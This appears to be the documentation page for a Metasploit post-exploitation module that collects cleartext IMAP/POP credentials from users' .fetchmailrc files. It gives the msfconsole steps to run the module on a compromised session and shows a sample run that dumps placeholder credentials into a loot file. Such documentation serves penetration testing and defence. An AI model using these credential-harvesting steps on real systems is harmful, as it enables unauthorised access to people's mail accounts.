Grant Willcox
1.7 KiB
1.7 KiB
Vulnerable Application
Post module to obtain credentials saved for IMAP, POP and other mail
retrieval protocols in fetchmail's .fetchmailrc.
This file is kept in user's home directories to configure fetchmail, but contains cleartext credentials.
Example fetchmailrc file
Example documentation can be found in the fetchmail handbook: https://docs.freebsd.org/doc/6.0-RELEASE/usr/share/doc/handbook/mail-fetchmail.html#:~:text=fetchmailrc%20serves%20as%20an%20example,user%20on%20the%20local%20system.
echo "poll example.com protocol pop3 username \"joesoap\" password \"XXX\"" > ~/.fetchmailrc
Verification Steps
- Start msfconsole
- Get a shell on a system
- Do:
use post/multi/gather/fetchmailrc_creds - Do:
set session [session] - Do:
run - If any
.fetchmailrcfiles exist with credentials, they will be read and stored into a loot file.
Options
Scenarios
Ubuntu 22.04.01
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH ubuntu @ 2.2.2.2:39857 -> 1.1.1.1:22 (1.1.1.1)
msf6 auxiliary(scanner/ssh/ssh_login) > use post/multi/gather/fetchmailrc_creds
msf6 post(multi/gather/fetchmailrc_creds) > set session 1
session => 1
msf6 post(multi/gather/fetchmailrc_creds) > run
[*] Parsing /home/ubuntu/.fetchmailrc
.fetchmailrc credentials
========================
Username Password Server Protocol Port
-------- -------- ------ -------- ----
joesoap XXX example.com pop3
[*] Credentials stored in: /root/.msf4/loot/20221008102916_default_1.1.1.1_fetchmailrc.cred_476989.txt
[*] Post module execution completed